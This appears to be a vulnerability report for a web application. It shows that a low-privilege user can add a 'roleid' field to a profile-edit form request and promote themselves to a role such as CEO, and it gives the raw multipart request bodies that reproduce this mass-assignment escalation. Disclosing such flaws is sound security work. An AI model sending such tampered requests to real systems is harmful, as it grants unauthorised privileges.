Insufficient permission checking on "roleid" parameter during profile edition
A user without administrative privileges can modify his own "roleid" parameter containing the applicative role of the user (CEO, Vice President, Sales Manager, etc.). This is due to insufficient permission checking during profile modification.
How to reproduce:
To better illustrate this vulnerability, I created a "guest" role with the lowest permissions possible (basically no permissions).
If an administrator edits the "noob" user profile, we see that the parameter "roleid" containing "H7" ("H7" for guest, "H2" for CEO, "H3" for Vice President and so on) is sent in the request and is used to specify the user's role.
-----------------------------5872578910825
Content-Disposition: form-data; name="last_name"
noob
-----------------------------5872578910825
Content-Disposition: form-data; name="is_admin"
0
-----------------------------5872578910825
Content-Disposition: form-data; name="roleid"
H7
-----------------------------5872578910825
Content-Disposition: form-data; name="lead_view"
Today
-----------------------------5872578910825When the "noob" user edits his profile, the parameter "roleid" is absent from the request.
Content-Disposition: form-data; name="last_name"
noob
-----------------------------7135213064867
Content-Disposition: form-data; name="lead_view"
Today
-----------------------------7135213064867However, if it is added by the user, the application accept the parameter and modifies the user's role, even if he doesn't have the required permissions to do so.
Content-Disposition: form-data; name="last_name"
noob
-----------------------------7135213064867
Content-Disposition: form-data; name="roleid"
H2
-----------------------------7135213064867
Content-Disposition: form-data; name="lead_view"
Today
-----------------------------7135213064867
The "is_admin" parameter is also present when the administrator edits the profile, however the permissions seems to be enforced on this one and a non admin user can't modify it.